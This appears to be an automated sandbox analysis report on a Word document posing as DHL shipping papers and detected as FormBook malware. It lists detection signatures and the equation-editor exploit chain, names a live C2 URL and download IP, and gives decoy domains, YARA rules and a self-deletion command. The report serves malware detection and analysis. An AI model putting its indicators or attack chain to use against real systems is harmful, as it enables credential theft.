Play interactive tour

Edit tour

Analysis Report DHL Shipping doc & Shipment tracking details.docx

Overview

General Information

Sample Name:	DHL Shipping doc & Shipment tracking details.docx
Analysis ID:	383965
MD5:	30909a9932c77fb923a96b1b090b4806
SHA1:	2bbe988290a47de63763796db6a39de0e268a5cf
SHA256:	23e650ad3f02ea9f4a402bf5e719d745b7c307c34fd8915045c79d51aab48741
Tags:	Formbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Uses netstat to query active network connections and open ports

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains sections with non-standard names

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2244 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2564 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2452 cmdline: 'C:\Users\Public\vbc.exe' MD5: 29E8627D7B80C21FC98C82314F3DF5E2)

vbc.exe (PID: 2828 cmdline: 'C:\Users\Public\vbc.exe' MD5: 29E8627D7B80C21FC98C82314F3DF5E2)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

NETSTAT.EXE (PID: 852 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)

cmd.exe (PID: 2192 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.scott-re.online/nnmd/"], "decoy": ["bongwater.life", "regalparkllc.com", "gyanankuram.com", "quehaydecenarhoy.com", "israeldigitalblog.net", "gatewaygaurdians.com", "krphp.com", "domentemenegi47.com", "fjsibao.com", "yetbor.com", "goldenvalueable.com", "finalexam-thegame.com", "buyeverythingforbaby.com", "phillydroneservices.com", "xn--kck4cd0r.net", "suns-brothers.com", "xn--80aaxkmix.xn--p1acf", "pjsgsc.com", "7985699.com", "blackmantech.fitness", "acernoxsas.com", "verochfotografa.com", "az-pcp.com", "clonegrandma.com", "elpis-catering.com", "gujaratmba.com", "samanthataylordesigns.com", "sinisviaggi.com", "likehowto.com", "ueoxx.com", "americanscreentest.com", "taniakarina.com", "nevomo.group", "syduit.com", "elticrecruit.com", "xn--v1bmo9dufsb.com", "valid8.network", "vt999app.net", "privateselights.com", "xpddwrfj.icu", "mex33.info", "ekolucky.com", "v6b9.com", "winnijermaynezigmund.site", "papofabri.com", "ranguanglian.club", "vinegret.com", "sorelaxedmassage.com", "vr-club.site", "raison-sociale.com", "partapprintercare.com", "dream-e-mail.com", "cwcellar.com", "vegrebel.com", "my-weight-loss-blog.net", "hcr.services", "topmejoresproductos.com", "foodates.com", "l2zmamzoin.xyz", "nevertraveled.com", "ikoyisland.net", "lawsoftwareteam.com", "ufa2345.com", "thechilldrengang.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9b88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9f22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15c35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15721:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15d37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15eaf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa93a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1499c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb6b2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ad27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bdca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17c59:$sqlite3step: 68 34 1C 7B E1 0x17d6c:$sqlite3step: 68 34 1C 7B E1 0x17c88:$sqlite3text: 68 38 2A 90 C5 0x17dad:$sqlite3text: 68 38 2A 90 C5 0x17c9b:$sqlite3blob: 68 53 D8 7F 8C 0x17dc3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.1.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.1.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.1.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
11.2.vbc.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.vbc.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.vbc.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
11.2.vbc.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.vbc.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.vbc.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
11.1.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.1.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.1.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: www.scott-re.online/nnmd/

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.scott-re.online/nnmd/"], "decoy": ["bongwater.life", "regalparkllc.com", "gyanankuram.com", "quehaydecenarhoy.com", "israeldigitalblog.net", "gatewaygaurdians.com", "krphp.com", "domentemenegi47.com", "fjsibao.com", "yetbor.com", "goldenvalueable.com", "finalexam-thegame.com", "buyeverythingforbaby.com", "phillydroneservices.com", "xn--kck4cd0r.net", "suns-brothers.com", "xn--80aaxkmix.xn--p1acf", "pjsgsc.com", "7985699.com", "blackmantech.fitness", "acernoxsas.com", "verochfotografa.com", "az-pcp.com", "clonegrandma.com", "elpis-catering.com", "gujaratmba.com", "samanthataylordesigns.com", "sinisviaggi.com", "likehowto.com", "ueoxx.com", "americanscreentest.com", "taniakarina.com", "nevomo.group", "syduit.com", "elticrecruit.com", "xn--v1bmo9dufsb.com", "valid8.network", "vt999app.net", "privateselights.com", "xpddwrfj.icu", "mex33.info", "ekolucky.com", "v6b9.com", "winnijermaynezigmund.site", "papofabri.com", "ranguanglian.club", "vinegret.com", "sorelaxedmassage.com", "vr-club.site", "raison-sociale.com", "partapprintercare.com", "dream-e-mail.com", "cwcellar.com", "vegrebel.com", "my-weight-loss-blog.net", "hcr.services", "topmejoresproductos.com", "foodates.com", "l2zmamzoin.xyz", "nevertraveled.com", "ikoyisland.net", "lawsoftwareteam.com", "ufa2345.com", "thechilldrengang.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 41%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Source: 11.2.vbc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: netstat.pdb source: vbc.exe, 0000000B.00000002.2145782499.00000000003E0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE

Source: global traffic

DNS query: name: www.nevomo.group

Source: global traffic

TCP traffic: 192.168.2.22:49170 -> 23.95.122.24:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 23.95.122.24:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49168 -> 23.95.122.24:80
Source: Traffic	Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49169 -> 23.95.122.24:80
Source: Traffic	Snort IDS: 1142 WEB-MISC /.... access 192.168.2.22:49170 -> 23.95.122.24:80
Source: Traffic	Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49172 -> 23.95.122.24:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.scott-re.online/nnmd/

Uses netstat to query active network connections and open ports

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

Source: global traffic

